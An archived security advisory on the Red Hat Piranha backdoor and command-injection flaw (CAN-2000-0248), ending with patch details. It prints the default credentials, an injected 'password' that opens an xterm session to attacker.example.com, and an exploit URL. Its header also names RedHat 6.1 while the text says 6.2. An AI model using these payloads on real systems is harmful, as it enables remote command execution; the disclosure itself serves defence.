COMMAND
Red Hat Linux Virtual Server Package
SYSTEMS AFFECTED
RedHat 6.1
PROBLEM
Following is based on ISS Security Advisory. ISS X-Force has
identified a backdoor password in the Red Hat Linux Piranha
product. Piranha is a package distributed by Red Hat, Inc. that
contains the Linux Virtual Server (LVS) software, a web-based
GUI, and monitoring and fail-over components. A backdoor password
exists in the GUI portion of Piranha that may allow remote
attackers to execute commands on the server. If an affected
version of Piranha is installed and the default backdoor password
remains unchanged, any remote as well as local user may login to
the LVS web interface. From here LVS parameters can be changed
and arbitrary commands can be executed with the same privilege as
that of the web server. With this backdoor password, an attacker
could compromise the web server as well as deface and destroy the
web site.
Piranha is distributed in three Red Hat Package Managers (RPMs):
"piranha", "piranha-gui", and "piranha-docs". The vulnerability
is present if version 0.4.12 of piranha-gui is installed. The
current distribution of Red Hat Linux 6.2 distribution is
vulnerable. Earlier versions of the Red Hat distribution do not
contain this vulnerability.
Piranha is a collection of utilities used to administer the Linux
Virtual Server. LVS is a scalable and highly available server
designed for large enterprise environments. It allows seamless
clustering of multiple web servers through load balancing,
heartbeat monitoring, redundancy, and fail-over protection. To
the end user, the entire system is completely transparent,
appearing as if a single server is fielding every request.
Piranha is shipped with a web-based GUI that allows system
administrators to configure and monitor the cluster. The Piranha
package contains an undocumented backdoor account and password
that may allow a remote attacker access to the LVS web
administration tools. Attackers could use these tools to cause
the interface to execute arbitrary commands against the server.
Commands are executed with the same privilege level of the web
server, which varies based on the configuration of the system.
The vulnerability is present even if the LVS service is not used
on the system. If the affected "piranha-gui" package is installed
and the password has not been changed by the administrator, the
system is vulnerable.
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2000-0248 to this issue. This is a
candidate for inclusion in the CVE list which standardizes names
for security problems. This vulnerability was discovered and
researched by Allen Wilson of Internet Security Systems and ISS
X-Force.
Max Vision in the interest of full disclosure brought to public
details of the piranha vulnerability. To summarize, piranha is a
GUI tool for monitoring, configuring, and administering an LVS
cluster. The Redhat 6.2 package piranha-0.4.12 supports web-based
php3 interface which is protected by basic authentication. A
default account is provided, that if known, would allow remote
users to change the piranha password as well as run arbitrary
commands on the web server by exploiting a hole in the passwd.php3
script.
There are basically two problems with the piranha-0.4.12 package,
that when combined yield shell access for an attacker. The
reason earlier versions are not vulnerable is because of the
shift away from the gui, towards a web-based php3 interface.
The first problem is the default account and password that
protect the web directory containing the administrative php3
scripts. This is what ISS called a "backdoor" - which is
actually a default password. The default username/password is:
piranha/q
Now the ironic part is, the second part of the vulnability lies
within the program that is used to change the password! By
default this is installed into /home/httpd/html/piranha/secure as
passwd.php3, or:
http://victim.example.com/piranha/secure/passwd.php3
Once you authenticate (see first vulnerability), a form will come
up asking for the new password. To avoid typo-regret, you must
enter the password twice. It will then proceed to change the
piranha password to whatever you provided as the new password.
It does this by passing your input to a shell command without
filtering for metacharacters... passwd.php3:
echo "<TD>The passwords you supplied match<BR>";
$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;
As one can see, this allows for more creative "new passwords",
such as this one:
g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;
Example exploit URL (requires authentication):
http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
SOLUTION
Red Hat has provided updated piranha, piranha-doc, and piranha-gui
packages 0.4.13-1. ISS X-Force recommends that these patches be
installed immediately. The updated piranha-gui package addresses
the password and arbitrary command execution vulnerability. After
upgrading to piranha 0.4.13-1 users should ensure that a password
is set by logging into the piranha web gui and setting one. The
updated packages are available on ftp://updates.redhat.com/6.2,
and their version number is 0.4.13-1. The file names for the new
packages are as follows:
- SRPMS/piranha-0.4.13-1.src.rpm
- alpha/piranha-0.4.13-1.alpha.rpm
- alpha/piranha-docs-0.4.13-1.alpha.rpm
- alpha/piranha-gui-0.4.13-1.alpha.rpm
- i386/piranha-0.4.13-1.i386.rpm
- i386/piranha-docs-0.4.13-1.i386.rpm
- i386/piranha-gui-0.4.13-1.i386.rpm
- sparc/piranha-0.4.13-1.sparc.rpm
- sparc/piranha-docs-0.4.13-1.sparc.rpm
- sparc/piranha-gui-0.4.13-1.sparc.rpm